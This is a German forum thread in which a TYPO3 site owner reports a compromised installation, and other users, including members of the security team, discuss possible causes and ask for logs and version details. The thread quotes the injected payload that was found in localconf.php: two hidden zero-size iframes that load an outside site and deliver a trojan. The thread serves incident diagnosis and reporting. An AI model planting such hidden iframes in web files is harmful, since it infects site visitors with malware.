[josDesign]

Hallo COmmunity!

Ich glaub mich trifft der Schlag...

Heute wollte ich mich auf einer der Kundenseiten einloggen im BE. Komm aber nicht mehr hin und ein Trojaner wurde geladen...

Daraufhin hab ich kurz in die localconf.php gesehen..

Code:

// Updated by TYPO3 Extension Manager 28-01-2007 18:45:42
?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Wie kommt der da rein?

Weiters kann ich mich nicht mehr einloggen im BE und im Installtool logge ich mich ein, und beim nächsten Klick auf einen Menüpunkt im Installtool hauts mich raus...

Konnte gerade im Inet darüber was finden, wobei hier aber das Joomla betroffen war.

Die Version ist 4.0


Hilfe, da hilft nur noch löschen und neuinstallieren, oder?

[just2b]

wohl macina_banners/ric_rotation installiert gewesen?

[josDesign]

Nein, noch gar nichts! Ein nacktes T3 in der Version 4.0. Welches noch in der Testphase war.
Keine zusätzliche Extension programmiert.

Hab jetzt alles vom Server gelöscht, da wir nicht viel Webspace haben dort.

[AFisch]

HI ho

Es kann auch das hier gewesen sein:
http://news.typo3.org/news/article/t...tion-in-typo3/

Evtl. auch gar nix von dem, sondern nur ein unsicherer Webserver und ein böser Nachbar.

Gruß AFisch

[josDesign]

RRichtig!

Die Seite lieg noch auf den Servern von easyserver.at. Und Supporttechnisch gesehen unter dem Hund. Leider sind sie sehr billig und das passt dem Kunden recht gut. Hmm, vielen Dank!

[jweiland]

Wer von diesem "iFrame" Problem betroffen ist sollte sich an das TYPO3 Security Team wenden (http://typo3.org/teams/security/contact-us)

Interessant für uns sind in dem Zusammenhang folgende Informationen:

- verwendete TYPO3 Version
- Liste der installierten Extensions
- wird ggf. eine Software für die Verwaltung des Servers eingesetzt, wie cPanel, confixx, plesk o.ä.
- Apache Logfiles

Jochen Weiland

[jugglefish]

Hallo,
dezeit grassiert leider eine größere Welle solcher exploits. Dabei handelt es sich um *kein* TYPO3-spezifisches Problem. Auch viele andere systeme sind betroffen, es wurden scheinbar die verschiedensten Lücken ausgenutzt.

Das TYPO3 Security-team ist sehr an einer Aufklärung der vorgänge interessiert.

Wenn möglich bitten wir das Security-Team mit Detailangaben zu dem Hack zu informieren.
http://typo3.org/teams/security/contact-us/

In diesem Fall wäre es sicherlich lohnenswert:
a) die Version der rtehtmlarea-extension mitzuteilen
b) in den Apahce-Logs zu prüfen ob da unberechtigte Zugriffe auf eine der rtehtmlarea-dateien erfolgt sind (vgl. dazu: http://news.typo3.org/news/article/t...tion-in-typo3/)

Gruß,
Peter Niederlag

[josDesign]

Hallo Jochen!

Wow, ich bekomme eine Antwort von einem zu den ich hochsehe!

Du Jochen, das ist jetzt blöd..

Die Version ist 4.0
Nur die inkludierten Extensions wie sie damals im Februar im Package dabei waren
Alles andere werde ich nie herausfinden können, da der WEbspace-Provider wo die Seite NOCH liegt (ab nächster Woche nicht mehr) keinen Support gibt. Und wenn dann nur, wenn man ein paar Wochen wartet. :sad: Sorry!



Offtopic: Eine andere Frage Jochen. Auf deiner WEbsite gabs das gute Tutorial zum Thema Mahrsprachigkeit. Wird dies gerade upgedatet, oder??? Es ist nicht mehr online, und ich würds gerne nochmal eine durchlesen... !!!


lieGRÜ
jos

[mstuebner]

Zitat:

Zitat von josDesign

RRichtig!

Richtig, WAS?

[josDesign]

Zitat:

Zitat von mstuebner

Richtig, WAS?

Na das war der Fehler! Also, mir scheint dies als der einzig mögliche gewesen zu sein ;)